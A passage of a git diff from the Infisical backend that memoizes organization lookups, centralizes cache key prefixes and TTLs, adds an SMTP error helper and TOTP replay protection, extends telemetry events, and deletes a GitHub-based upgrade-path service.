serviceTokenServiceFactory = ({ if (!isMatch) throw new UnauthorizedError({ message: "Invalid service token" }); await accessTokenQueue.updateServiceTokenStatus(serviceToken.id); - const serviceTokenOrgDetails = await orgDAL.findById(project.orgId); + const serviceTokenOrgDetails = await requestMemoize(requestMemoKeys.orgFindById(project.orgId), () => + orgDAL.findById(project.orgId) + ); return { ...serviceToken, diff --git a/backend/src/services/smtp/smtp-service.ts b/backend/src/services/smtp/smtp-service.ts index 3449029836b..cbdc8cde5b6 100644 --- a/backend/src/services/smtp/smtp-service.ts +++ b/backend/src/services/smtp/smtp-service.ts @@ -4,6 +4,7 @@ import SMTPTransport from "nodemailer/lib/smtp-transport"; import React from "react"; import { getConfig } from "@app/lib/config/env"; +import { InternalServerError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; import { @@ -212,3 +213,16 @@ export const smtpServiceFactory = (cfg: TSmtpConfig) => { return { sendMail, verify }; }; + +export const throwIfSmtpError = (err: unknown, logMessage: string) => { + logger.error(err, logMessage); + const { isCloud } = getConfig(); + // We must always throw so the user is not left waiting for an email that never arrives. + // On cloud, we show a generic message to avoid exposing internal misconfiguration details. + throw new InternalServerError({ + message: isCloud + ? "We could not send you an email. Please try again later." + : "Failed to send email. This is likely due to a misconfigured SMTP server. 
Please check your SMTP settings and try again.", + name: "SmtpError" + }); +}; diff --git a/backend/src/services/super-admin/invalidate-cache-queue.ts b/backend/src/services/super-admin/invalidate-cache-queue.ts index c2a12f5d5ce..0eda4e643b4 100644 --- a/backend/src/services/super-admin/invalidate-cache-queue.ts +++ b/backend/src/services/super-admin/invalidate-cache-queue.ts @@ -1,4 +1,4 @@ -import { TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { logger } from "@app/lib/logger"; import { QueueJobs, QueueName, TQueueServiceFactory } from "@app/queue"; @@ -31,15 +31,19 @@ export const invalidateCacheQueueFactory = ({ queueService, keyStore }: TInvalid data: { type } } = job.data; - await keyStore.setItemWithExpiry("invalidating-cache", 1800, "true"); // 30 minutes max (in case the job somehow silently fails) + await keyStore.setItemWithExpiry( + KeyStorePrefixes.InvalidatingCache, + KeyStoreTtls.InvalidatingCacheInSeconds, + "true" + ); // 30 minutes max (in case the job somehow silently fails) if (type === CacheType.ALL || type === CacheType.SECRETS) - await keyStore.deleteItems({ pattern: "secret-manager:*" }); + await keyStore.deleteItems({ pattern: KeyStorePrefixes.SecretManagerCachePattern }); - await keyStore.deleteItem("invalidating-cache"); + await keyStore.deleteItem(KeyStorePrefixes.InvalidatingCache); } catch (err) { logger.error(err, "Failed to invalidate cache"); - await keyStore.deleteItem("invalidating-cache"); + await keyStore.deleteItem(KeyStorePrefixes.InvalidatingCache); } }); diff --git a/backend/src/services/super-admin/super-admin-service.ts b/backend/src/services/super-admin/super-admin-service.ts index 63f21e003ab..ffb8920b8e4 100644 --- a/backend/src/services/super-admin/super-admin-service.ts +++ b/backend/src/services/super-admin/super-admin-service.ts @@ -12,7 +12,7 @@ import { import { TEmailDomainDALFactory } from 
"@app/ee/services/email-domain/email-domain-dal"; import { EmailDomainStatus } from "@app/ee/services/email-domain/email-domain-types"; import { TLicenseServiceFactory } from "@app/ee/services/license/license-service"; -import { PgSqlLock, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, PgSqlLock, TKeyStoreFactory } from "@app/keystore/keystore"; import { withCache } from "@app/lib/cache/with-cache"; import { getConfig, @@ -24,6 +24,8 @@ import { import { crypto } from "@app/lib/crypto/cryptography"; import { BadRequestError, NotFoundError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { OrgServiceActor } from "@app/lib/types"; import { isDisposableEmail, sanitizeEmail, validateEmail } from "@app/lib/validator"; import { TAuthTokenServiceFactory } from "@app/services/auth-token/auth-token-service"; @@ -128,8 +130,6 @@ export const getInstanceIntegrationsConfig = () => { return adminIntegrationsConfig; }; -const ADMIN_CONFIG_KEY = "infisical-admin-cfg"; -const ADMIN_CONFIG_KEY_EXP = 60; // 60s export const ADMIN_CONFIG_DB_UUID = "00000000-0000-0000-0000-000000000000"; export const superAdminServiceFactory = ({ @@ -160,8 +160,8 @@ export const superAdminServiceFactory = ({ getServerCfg = async () => { const serverCfg = await withCache({ keyStore, - key: ADMIN_CONFIG_KEY, - ttlSeconds: ADMIN_CONFIG_KEY_EXP, + key: KeyStorePrefixes.AdminConfig, + ttlSeconds: KeyStoreTtls.AdminConfigInSeconds, fetcher: async () => { const cfg = await serverCfgDAL.findById(ADMIN_CONFIG_DB_UUID); if (!cfg) { @@ -181,7 +181,7 @@ export const superAdminServiceFactory = ({ }; // reset on initialized - await keyStore.deleteItem(ADMIN_CONFIG_KEY); + await keyStore.deleteItem(KeyStorePrefixes.AdminConfig); const serverCfg = await serverCfgDAL.transaction(async (tx) => { await 
tx.raw("SELECT pg_advisory_xact_lock(?)", [PgSqlLock.SuperAdminInit]); const serverCfgInDB = await serverCfgDAL.findById(ADMIN_CONFIG_DB_UUID); @@ -463,9 +463,16 @@ export const superAdminServiceFactory = ({ const updatedServerCfg = await serverCfgDAL.updateById(ADMIN_CONFIG_DB_UUID, updatedData); try { - await keyStore.setItemWithExpiry(ADMIN_CONFIG_KEY, ADMIN_CONFIG_KEY_EXP, JSON.stringify(updatedServerCfg)); + await keyStore.setItemWithExpiry( + KeyStorePrefixes.AdminConfig, + KeyStoreTtls.AdminConfigInSeconds, + JSON.stringify(updatedServerCfg) + ); } catch (err) { - logger.warn({ key: ADMIN_CONFIG_KEY, err }, `updateServerCfg: cache write failed [key=${ADMIN_CONFIG_KEY}]`); + logger.warn( + { key: KeyStorePrefixes.AdminConfig, err }, + `updateServerCfg: cache write failed [key=${KeyStorePrefixes.AdminConfig}]` + ); } if (gitHubAppConnectionSettingsUpdated) { @@ -558,6 +565,7 @@ export const superAdminServiceFactory = ({ if (existingUser) throw new BadRequestError({ name: "Instance initialization", message: "User already exists" }); const userInfo = await userDAL.transaction(async (tx) => { + const hashedPassword = await crypto.hashing().createHash(password, appCfg.SALT_ROUNDS); const newUser = await userDAL.create( { firstName: "Admin", @@ -568,13 +576,12 @@ export const superAdminServiceFactory = ({ isGhost: false, isAccepted: true, authMethods: [AuthMethod.EMAIL], - isEmailVerified: true + isEmailVerified: true, + hashedPassword }, tx ); - const hashedPassword = await crypto.hashing().createHash(password, appCfg.SALT_ROUNDS); - const userEnc = await userDAL.createUserEncryption( { userId: newUser.id, @@ -584,7 +591,7 @@ export const superAdminServiceFactory = ({ tx ); - return { user: newUser, enc: userEnc }; + return { user: { ...newUser, hashedPassword: null }, enc: userEnc }; }); const initialOrganizationName = organizationName ?? 
"Admin Org"; @@ -977,7 +984,7 @@ export const superAdminServiceFactory = ({ throw new NotFoundError({ message: "Could not find server admin user" }); } - const org = await orgDAL.findById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!org) { throw new NotFoundError({ message: `Could not organization with ID "${orgId}"` }); @@ -1042,7 +1049,9 @@ export const superAdminServiceFactory = ({ throw new BadRequestError({ message: "No invite email associated with user." }); } - const org = await orgDAL.findOrgById(orgMembership.scopeOrgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgMembership.scopeOrgId), () => + orgDAL.findOrgById(orgMembership.scopeOrgId) + ); const appCfg = getConfig(); const serverAdmin = await userDAL.findById(actor.id); @@ -1161,7 +1170,7 @@ export const superAdminServiceFactory = ({ }; const checkIfInvalidatingCache = async () => { - return (await keyStore.getItem("invalidating-cache")) !== null; + return (await keyStore.getItem(KeyStorePrefixes.InvalidatingCache)) !== null; }; const initializeAdminIntegrationConfigSync = async () => { @@ -1194,7 +1203,7 @@ export const superAdminServiceFactory = ({ }; const createEmailDomain = async ({ orgId, domain }: TAdminCreateEmailDomainDTO) => { - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!org) throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` }); const config = getConfig(); diff --git a/backend/src/services/telemetry/telemetry-service.ts b/backend/src/services/telemetry/telemetry-service.ts index 46ff97026f7..f11510fb0f4 100644 --- a/backend/src/services/telemetry/telemetry-service.ts +++ b/backend/src/services/telemetry/telemetry-service.ts @@ -8,7 +8,9 @@ import { getConfig } from "@app/lib/config/env"; import { request } from "@app/lib/config/request"; import { crypto } 
from "@app/lib/crypto/cryptography"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { ActorType } from "@app/services/auth/auth-type"; import { TOrgDALFactory } from "@app/services/org/org-dal"; @@ -18,8 +20,6 @@ export const TELEMETRY_SECRET_PROCESSED_KEY = "telemetry-secret-processed"; export const TELEMETRY_SECRET_OPERATIONS_KEY = "telemetry-secret-operations"; export const POSTHOG_AGGREGATED_EVENTS = [PostHogEventTypes.SecretPulled, PostHogEventTypes.MachineIdentityLogin]; -const TELEMETRY_AGGREGATED_KEY_EXP = 600; // 10mins -const GROUP_IDENTIFY_CACHE_TTL = 3600; // 1 hour // Bucket configuration const TELEMETRY_BUCKET_COUNT = 30; @@ -60,7 +60,7 @@ const getBucketForDistinctId = (distinctId: string): string => { export const createTelemetryEventKey = (event: string, distinctId: string): string => { const bucketId = getBucketForDistinctId(distinctId); - return `telemetry-event-${event}-${bucketId}-${distinctId}-${crypto.nativeCrypto.randomUUID()}`; + return KeyStorePrefixes.TelemetryEvent(event, bucketId, distinctId, crypto.nativeCrypto.randomUUID()); }; export enum DeploymentType { @@ -74,17 +74,17 @@ export enum DeploymentType { * Computes the deployment type based on the instance type and environment configuration. 
* - US Cloud: instanceType is Cloud and INTERNAL_REGION is "us" (or unset, defaults to US) * - EU Cloud: instanceType is Cloud and INTERNAL_REGION is "eu" - * - Dedicated: INFISICAL_CLOUD is true but instanceType is not Cloud (uses self-hosted license keys) + * - Dedicated: INFISICAL_DEDICATED is true * - Self-Hosted: everything else */ const getDeploymentType = ( instanceType: InstanceType, - appConfig: { INFISICAL_CLOUD: boolean; INTERNAL_REGION?: string } + appConfig: { INFISICAL_CLOUD: boolean; INFISICAL_DEDICATED: boolean; INTERNAL_REGION?: string } ) => { if (instanceType === InstanceType.Cloud) { return appConfig.INTERNAL_REGION === "eu" ? DeploymentType.EUCloud : DeploymentType.USCloud; } - if (appConfig.INFISICAL_CLOUD) { + if (appConfig.INFISICAL_DEDICATED) { return DeploymentType.Dedicated; } return DeploymentType.SelfHosted; @@ -135,7 +135,8 @@ To opt into telemetry, you can set "TELEMETRY_ENABLED=true" within the environme email: string, signupMethod: HubSpotSignupMethod, firstName?: string, - lastName?: string + lastName?: string, + hubspotUtk?: string ) => { const instanceType = licenseService.getInstanceType(); if ( @@ -159,14 +160,22 @@ To opt into telemetry, you can set "TELEMETRY_ENABLED=true" within the environme if (value) fields.push({ name, value }); } + const context: Record = { + pageUri: `${appCfg.SITE_URL || "https://app.infisical.com"}/signup`, + pageName: "App Signup" + }; + + // Include the HubSpot tracking cookie to link this submission + // to the visitor's browsing session for proper attribution + if (hubspotUtk) { + context.hutk = hubspotUtk; + } + await request.post( `https://api.hsforms.com/submissions/v3/integration/submit/${appCfg.HUBSPOT_PORTAL_ID}/${appCfg.HUBSPOT_SIGNUP_FORM_ID}`, { fields, - context: { - pageUri: `${appCfg.SITE_URL || "https://app.infisical.com"}/signup`, - pageName: "App Signup" - } + context }, { headers: { @@ -195,7 +204,7 @@ To opt into telemetry, you can set "TELEMETRY_ENABLED=true" within the 
environme } try { - const org = await orgDAL.findOrgById(orgId); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (org) { if (!properties.name) { properties.name = org.name; @@ -248,7 +257,7 @@ To opt into telemetry, you can set "TELEMETRY_ENABLED=true" within the environme const eventKey = createTelemetryEventKey(event.event, event.distinctId); await keyStore.setItemWithExpiry( eventKey, - TELEMETRY_AGGREGATED_KEY_EXP, + KeyStoreTtls.TelemetryAggregatedEventInSeconds, JSON.stringify({ distinctId: event.distinctId, event: event.event, @@ -263,7 +272,7 @@ To opt into telemetry, you can set "TELEMETRY_ENABLED=true" within the environme // Dedup groupIdentify: only fire once per org per hour to avoid redundant DB/API calls const groupIdentifyCacheKey = KeyStorePrefixes.TelemetryGroupIdentify(orgId); void keyStore - .setItemWithExpiryNX(groupIdentifyCacheKey, GROUP_IDENTIFY_CACHE_TTL, "1") + .setItemWithExpiryNX(groupIdentifyCacheKey, KeyStoreTtls.TelemetryGroupIdentifyInSeconds, "1") .then((wasSet) => { if (wasSet) { return getOrgGroupProperties(orgId, resolvedOrgName).then((groupProperties) => { @@ -362,7 +371,7 @@ To opt into telemetry, you can set "TELEMETRY_ENABLED=true" within the environme if (!postHog) return 0; try { - const bucketPattern = `telemetry-event-${eventType}-${bucketId}-*`; + const bucketPattern = KeyStorePrefixes.TelemetryEventByBucketPattern(eventType, bucketId); const bucketKeys = await keyStore.getKeysByPattern(bucketPattern); if (bucketKeys.length === 0) return 0; @@ -402,7 +411,11 @@ To opt into telemetry, you can set "TELEMETRY_ENABLED=true" within the environme // Dedup groupIdentify across all paths: only fire once per org per hour const groupIdentifyCacheKey = KeyStorePrefixes.TelemetryGroupIdentify(key.org); // eslint-disable-next-line no-await-in-loop - const wasSet = await keyStore.setItemWithExpiryNX(groupIdentifyCacheKey, GROUP_IDENTIFY_CACHE_TTL, "1"); + const wasSet = 
await keyStore.setItemWithExpiryNX( + groupIdentifyCacheKey, + KeyStoreTtls.TelemetryGroupIdentifyInSeconds, + "1" + ); if (wasSet) { let groupProperties = orgPropertiesCache.get(key.org); if (!groupProperties) { @@ -466,8 +479,6 @@ To opt into telemetry, you can set "TELEMETRY_ENABLED=true" within the environme } }; - const TELEMETRY_IDENTIFY_CACHE_KEY_PREFIX = "telemetry-identify"; - const TELEMETRY_IDENTIFY_CACHE_TTL = 86400; // 24 hours // Shorter TTL for in-memory fallback to bound memory growth during Redis outages const IN_MEMORY_IDENTIFY_FALLBACK_TTL_MS = 5 * 60 * 1000; // 5 minutes @@ -491,9 +502,13 @@ To opt into telemetry, you can set "TELEMETRY_ENABLED=true" within the environme if (postHog && distinctId) { if (!skipDedup) { try { - const cacheKey = `${TELEMETRY_IDENTIFY_CACHE_KEY_PREFIX}:${distinctId}`; + const cacheKey = KeyStorePrefixes.TelemetryIdentify(distinctId); // Atomic SET NX + EX: only the first caller within the TTL window proceeds - const wasSet = await keyStore.setItemWithExpiryNX(cacheKey, TELEMETRY_IDENTIFY_CACHE_TTL, "1"); + const wasSet = await keyStore.setItemWithExpiryNX( + cacheKey, + KeyStoreTtls.TelemetryIdentifyIdentityInSeconds, + "1" + ); if (!wasSet) return; } catch (error) { logger.error(error, `Failed to check PostHog identify dedup cache for distinctId=${distinctId}`); diff --git a/backend/src/services/telemetry/telemetry-types.ts b/backend/src/services/telemetry/telemetry-types.ts index 9a72395185b..5f870c8d314 100644 --- a/backend/src/services/telemetry/telemetry-types.ts +++ b/backend/src/services/telemetry/telemetry-types.ts @@ -3,6 +3,7 @@ import { AcmeAccountActor, AcmeProfileActor, EstAccountActor, + GatewayActor, IdentityActor, KmipClientActor, PlatformActor, @@ -12,6 +13,7 @@ import { UnknownUserActor, UserActor } from "@app/ee/services/audit-log/audit-log-types"; +import { PamParentType } from "@app/ee/services/pam-account/pam-account-enums"; import { SecretRotation } from 
"@app/ee/services/secret-rotation-v2/secret-rotation-v2-enums"; import { EnforcementLevel, SecretSharingAccessType } from "@app/lib/types"; import { AppConnection } from "@app/services/app-connection/app-connection-enums"; @@ -28,6 +30,7 @@ export enum PostHogEventTypes { SecretDeleted = "secrets deleted", AdminInit = "admin initialization", UserSignedUp = "User Signed Up", + UserLoginV2 = "User Login V2", SecretRotated = "secrets rotated", SecretScannerFull = "historical cloud secret scan", SecretScannerPush = "cloud secret scan", @@ -132,7 +135,8 @@ export type TSecretModifiedEvent = { | AcmeProfileActor | KmipClientActor | EstAccountActor - | ScepAccountActor; + | ScepAccountActor + | GatewayActor; }; }; @@ -155,6 +159,14 @@ export type TUserSignedUpEvent = { }; }; +export type TUserLoginV2Event = { + event: PostHogEventTypes.UserLoginV2; + properties: { + email: string; + channel: string; + }; +}; + export type TSecretScannerEvent = { event: PostHogEventTypes.SecretScannerFull | PostHogEventTypes.SecretScannerPush; properties: { @@ -737,7 +749,7 @@ export type TPamResourceEvent = { export type TPamAccountEvent = { event: PostHogEventTypes.PamAccountCreated | PostHogEventTypes.PamAccountDeleted; properties: { - resourceType: string; + parentType: PamParentType; projectId: string; }; }; @@ -754,7 +766,7 @@ export type TPamAccountAccessedEvent = { export type TPamAccountRotatedEvent = { event: PostHogEventTypes.PamAccountRotated; properties: { - resourceType: string; + parentType: PamParentType; projectId: string; }; }; @@ -814,6 +826,7 @@ export type TPostHogEvent = { distinctId: string; organizationId?: string; organ | TSecretModifiedEvent | TAdminInitEvent | TUserSignedUpEvent + | TUserLoginV2Event | TSecretScannerEvent | TUserOrgInvitedEvent | TMachineIdentityCreatedEvent diff --git a/backend/src/services/totp/totp-service.ts b/backend/src/services/totp/totp-service.ts index 193a27d90db..8af265a9ba6 100644 --- a/backend/src/services/totp/totp-service.ts +++ 
b/backend/src/services/totp/totp-service.ts @@ -1,5 +1,6 @@ import { authenticator } from "otplib"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; import { TKmsServiceFactory } from "../kms/kms-service"; @@ -20,13 +21,16 @@ type TTotpServiceFactoryDep = { userDAL: TUserDALFactory; totpConfigDAL: TTotpConfigDALFactory; kmsService: TKmsServiceFactory; + keyStore: Pick; }; +authenticator.options = { window: 1 }; + export type TTotpServiceFactory = ReturnType; const MAX_RECOVERY_CODE_LIMIT = 10; -export const totpServiceFactory = ({ totpConfigDAL, kmsService, userDAL }: TTotpServiceFactoryDep) => { +export const totpServiceFactory = ({ totpConfigDAL, kmsService, userDAL, keyStore }: TTotpServiceFactoryDep) => { const getUserTotpConfig = async ({ userId }: TGetUserTotpConfigDTO) => { const totpConfig = await totpConfigDAL.findOne({ userId @@ -176,6 +180,15 @@ export const totpServiceFactory = ({ totpConfigDAL, kmsService, userDAL }: TTotp message: "Invalid TOTP" }); } + + const claimed = await keyStore.setItemWithExpiryNX( + KeyStorePrefixes.UsedTotpCode(userId, totp), + KeyStoreTtls.UsedTotpCodeInSeconds, + "1" + ); + if (!claimed) { + throw new ForbiddenRequestError({ message: "Invalid TOTP" }); + } }; const verifyWithUserRecoveryCode = async ({ userId, recoveryCode }: TVerifyWithUserRecoveryCodeDTO) => { diff --git a/backend/src/services/upgrade-path/github-client.ts b/backend/src/services/upgrade-path/github-client.ts deleted file mode 100644 index 44aacca6daa..00000000000 --- a/backend/src/services/upgrade-path/github-client.ts +++ /dev/null @@ -1,242 +0,0 @@ -/* eslint-disable no-await-in-loop */ -import RE2 from "re2"; - -import { getConfig } from "@app/lib/config/env"; - -import { FormattedRelease, GitHubApiError, GitHubRelease } from "./types"; - -interface GitHubClientConfig { - token?: string; - timeout: number; - maxRetries: 
number; - retryDelay: number; - maxPagesPerRequest: number; - perPage: number; -} - -interface RateLimitInfo { - remaining: number; - reset: Date; - used: number; - limit: number; -} - -const getDefaultConfig = (): GitHubClientConfig => ({ - token: getConfig().GITHUB_API_TOKEN, - timeout: 30000, - maxRetries: 3, - retryDelay: 1000, - maxPagesPerRequest: 10, - perPage: 100 -}); - -const getHeaders = (token?: string): Record => { - const headers: Record = { - Accept: "application/vnd.github.v3+json", - "User-Agent": "Infisical-Upgrade-Path-Tool/1.0", - "X-GitHub-Api-Version": "2022-11-28" - }; - - if (token) { - headers.Authorization = `token ${token}`; - } - - return headers; -}; - -const delay = (ms: number): Promise => { - return new Promise((resolve) => { - setTimeout(resolve, ms); - }); -}; - -const isMainInfisicalRelease = (tagName: string): boolean => { - if ( - tagName.startsWith("infisical-cli/") || - tagName.startsWith("infisical-k8-operator/") || - tagName.startsWith("infisical-k8s-operator/") - ) { - return false; - } - - const patterns = [ - new RE2(/^v\d+\.\d+\.\d+/), - new RE2(/^\d+\.\d+\.\d+/), - new RE2(/^infisical\/v?\d+\.\d+\.\d+/), - new RE2(/^infisical\/v?\d+\.\d+\.\d+[-\w]*/) - ]; - - return patterns.some((pattern) => pattern.test(tagName)); -}; - -const normalizeVersion = (tagName: string): string => { - const versionMatch = tagName.match(new RE2(/(\d+\.\d+\.\d+(?:\.\d+)?)/)); - if (versionMatch) { - return `v${versionMatch[1]}`; - } - - if (tagName.startsWith("infisical/")) { - const withoutPrefix = tagName.replace(new RE2(/^infisical\//), ""); - return withoutPrefix.replace(new RE2(/-[a-zA-Z]+$/), ""); - } - return tagName.replace(new RE2(/-[a-zA-Z]+$/), ""); -}; - -const compareVersions = (v1: string, v2: string): number => { - const normalize = (v: string) => { - const versionMatch = v.match(new RE2(/(\d+\.\d+\.\d+(?:\.\d+)?)/)); - if (versionMatch) { - return versionMatch[1]; - } - if (v.startsWith("infisical/")) { - return v.replace(new 
RE2(/^infisical\/v?/), "").replace(new RE2(/-[a-zA-Z]+$/), ""); - } - return v.replace(new RE2(/^v/), "").replace(new RE2(/-[a-zA-Z]+$/), ""); - }; - - const clean1 = normalize(v1); - const clean2 = normalize(v2); - - const parts1 = clean1.split(".").map(Number); - const parts2 = clean2.split(".").map(Number); - - const maxLength = Math.max(parts1.length, parts2.length); - while (parts1.length < maxLength) parts1.push(0); - while (parts2.length < maxLength) parts2.push(0); - - for (let i = 0; i < maxLength; i += 1) { - if (parts1[i] > parts2[i]) return 1; - if (parts1[i] < parts2[i]) return -1; - } - return 0; -}; - -const isVersionAtLeastMinimum = (tagName: string, minimumVersion = "0.147.0"): boolean => { - return compareVersions(tagName, minimumVersion) >= 0; -}; - -const makeRequest = async ( - url: string, - config: GitHubClientConfig, - retryCount = 0 -): Promise<{ data: T; rateLimit: RateLimitInfo }> => { - const controller = new AbortController(); - const timeout = setTimeout(() => controller.abort(), config.timeout); - - try { - const response = await fetch(url, { - headers: getHeaders(config.token), - signal: controller.signal - }); - - clearTimeout(timeout); - - const rateLimit: RateLimitInfo = { - remaining: parseInt(response.headers.get("X-RateLimit-Remaining") || "0", 10), - reset: new Date(parseInt(response.headers.get("X-RateLimit-Reset") || "0", 10) * 1000), - used: parseInt(response.headers.get("X-RateLimit-Used") || "0", 10), - limit: parseInt(response.headers.get("X-RateLimit-Limit") || "5000", 10) - }; - - if (!response.ok) { - const error: GitHubApiError = new Error(`GitHub API error: ${response.status}`); - error.status = response.status; - error.headers = response.headers; - - if (response.status === 403) { - const resetTime = rateLimit.reset.toISOString(); - error.message = `GitHub API rate limit exceeded. Remaining: ${rateLimit.remaining}, Reset at: ${resetTime}. ${ - !config.token ? "Consider setting GITHUB_TOKEN environment variable." 
: "" - }`; - } - - if (retryCount < config.maxRetries && (response.status >= 500 || response.status === 403)) { - await delay(config.retryDelay * 2 ** retryCount); - return await makeRequest(url, config, retryCount + 1); - } - - throw error; - } - - const data = (await response.json()) as T; - return { data, rateLimit }; - } catch (error) { - clearTimeout(timeout); - - if (error instanceof Error && error.name === "AbortError") { - if (retryCount < config.maxRetries) { - await delay(config.retryDelay * 2 ** retryCount); - return await makeRequest(url, config, retryCount + 1); - } - throw new Error(`Request timeout after ${config.timeout}ms`); - } - - if (retryCount < config.maxRetries && !(error as GitHubApiError).status) { - await delay(config.retryDelay * 2 ** retryCount); - return await makeRequest(url, config, retryCount + 1); - } - - throw error; - } -}; - -export const fetchReleases = async (includePrerelease = false): Promise => { - const config = getDefaultConfig(); - const allReleases: GitHubRelease[] = []; - let page = 1; - let hasMorePages = true; - let reachedMinimumVersion = false; - - const maxConcurrentRequests = Math.min(3, config.maxPagesPerRequest); - - while (hasMorePages && page <= config.maxPagesPerRequest && !reachedMinimumVersion) { - const requests: Promise<{ data: GitHubRelease[]; rateLimit: RateLimitInfo }>[] = []; - - for (let i = 0; i < maxConcurrentRequests && page <= config.maxPagesPerRequest; i += 1, page += 1) { - const url = `https://api.github.com/repos/Infisical/infisical/releases?page=${page}&per_page=${config.perPage}`; - requests.push(makeRequest(url, config)); - } - - const results = await Promise.allSettled(requests); - let hasData = false; - - for (const result of results) { - if (result.status === "fulfilled") { - const { data } = result.value; - if (data.length > 0) { - for (const release of data) { - if (!release.draft && isMainInfisicalRelease(release.tag_name)) { - if (isVersionAtLeastMinimum(release.tag_name)) { - 
allReleases.push(release); - } else { - reachedMinimumVersion = true; - break; - } - } - } - hasData = true; - } - } - } - - if (!hasData || results.every((r) => r.status === "fulfilled" && r.value.data.length < config.perPage)) { - hasMorePages = false; - } - } - - const formattedReleases = allReleases - .map( - (release): FormattedRelease => ({ - tagName: release.tag_name, - normalizedTagName: normalizeVersion(release.tag_name), - name: release.name, - body: release.body, - publishedAt: release.published_at, - prerelease: release.prerelease, - draft: release.draft - }) - ) - .sort((a, b) => new Date(b.publishedAt).getTime() - new Date(a.publishedAt).getTime()); - - return formattedReleases.filter((release) => includePrerelease || !release.prerelease); -}; diff --git a/backend/src/services/upgrade-path/index.ts b/backend/src/services/upgrade-path/index.ts deleted file mode 100644 index 1000e2bfa48..00000000000 --- a/backend/src/services/upgrade-path/index.ts +++ /dev/null @@ -1,2 +0,0 @@ -export type { TUpgradePathService, TUpgradePathServiceFactory } from "./upgrade-path-service"; -export { upgradePathServiceFactory } from "./upgrade-path-service"; diff --git a/backend/src/services/upgrade-path/types.ts b/backend/src/services/upgrade-path/types.ts deleted file mode 100644 index 83d3d15469c..00000000000 --- a/backend/src/services/upgrade-path/types.ts +++ /dev/null @@ -1,66 +0,0 @@ -export interface GitHubRelease { - tag_name: string; - name: string; - body: string; - published_at: string; - prerelease: boolean; - draft: boolean; -} - -export interface FormattedRelease { - tagName: string; - normalizedTagName: string; - name: string; - body: string; - publishedAt: string; - prerelease: boolean; - draft: boolean; -} - -export interface BreakingChange { - title: string; - description: string; - action: string; -} - -export interface VersionConfig { - breaking_changes?: BreakingChange[]; - db_schema_changes?: string; - notes?: string; -} - -export interface 
UpgradePathConfig { - versions?: Record; -} - -export interface UpgradePathResult { - path: Array<{ - version: string; - name: string; - publishedAt: string; - prerelease: boolean; - }>; - breakingChanges: Array<{ - version: string; - changes: BreakingChange[]; - }>; - features: Array<{ - version: string; - name: string; - body: string; - publishedAt: string; - }>; - hasDbMigration: boolean; - config: Record; -} - -export interface GitHubApiError extends Error { - status?: number; - headers?: Headers; -} - -export interface CacheEntry { - data: T; - timestamp: number; - ttl: number; -} diff --git a/backend/src/services/upgrade-path/upgrade-path-schemas.ts b/backend/src/services/upgrade-path/upgrade-path-schemas.ts deleted file mode 100644 index a283505c7d8..00000000000 --- a/backend/src/services/upgrade-path/upgrade-path-schemas.ts +++ /dev/null @@ -1,24 +0,0 @@ -import RE2 from "re2"; -import { z } from "zod"; - -export const versionSchema = z - .string() - .min(1) - .max(50) - .regex(new RE2(/^[a-zA-Z0-9._/-]+$/), "Invalid version format"); - -export const breakingChangeSchema = z.object({ - title: z.string().min(1).max(200), - description: z.string().min(1).max(1000), - action: z.string().min(1).max(500) -}); - -export const versionConfigSchema = z.object({ - breaking_changes: z.array(breakingChangeSchema).optional(), - db_schema_changes: z.string().max(1000).optional(), - notes: z.string().max(2000).optional() -}); - -export const upgradePathConfigSchema = z.object({ - versions: z.record(versionSchema, versionConfigSchema).optional().nullable() -}); diff --git a/backend/src/services/upgrade-path/upgrade-path-service.ts b/backend/src/services/upgrade-path/upgrade-path-service.ts deleted file mode 100644 index e24743fc8fb..00000000000 --- a/backend/src/services/upgrade-path/upgrade-path-service.ts +++ /dev/null @@ -1,254 +0,0 @@ -import { readFile } from "fs/promises"; -import * as yaml from "js-yaml"; -import * as path from "path"; -import RE2 from "re2"; 
-import { z } from "zod"; - -import { TKeyStoreFactory } from "@app/keystore/keystore"; -import { withCache } from "@app/lib/cache/with-cache"; -import { logger } from "@app/lib/logger"; - -import { fetchReleases } from "./github-client"; -import { BreakingChange, FormattedRelease, UpgradePathConfig, UpgradePathResult } from "./types"; -import { versionConfigSchema, versionSchema } from "./upgrade-path-schemas"; - -export type TUpgradePathServiceFactory = { - keyStore: TKeyStoreFactory; -}; -export type TUpgradePathService = ReturnType; - -interface CalculateUpgradePathParams { - fromVersion: string; - toVersion: string; -} - -const UPGRADE_PATH_CONFIG_KEY = "upgrade-path:config"; -const UPGRADE_PATH_CONFIG_TTL = 24 * 60 * 60; // 24 hours -const UPGRADE_PATH_CACHE_TTL = 60 * 60; // 1 hour - -export const upgradePathServiceFactory = ({ keyStore }: TUpgradePathServiceFactory) => { - const sanitizeCacheKey = (key: string): string => { - return key.replace(new RE2(/[^a-zA-Z0-9\-:._]/g), "_"); - }; - const getGitHubReleases = async (): Promise => { - const cacheKey = "upgrade-path:releases"; - - try { - const cached = await keyStore.getItem(cacheKey); - if (cached) { - const cachedReleases = JSON.parse(cached) as FormattedRelease[]; - if (cachedReleases.length > 0) { - return cachedReleases; - } - } - } catch (error) { - logger.error(error, "Failed to retrieve releases from cache"); - } - - try { - const releases = await fetchReleases(false); - const filteredReleases = releases.filter((v) => !v.tagName.includes("nightly")); - - await keyStore.setItemWithExpiry(cacheKey, 24 * 60 * 60, JSON.stringify(filteredReleases)); - return filteredReleases; - } catch (error) { - 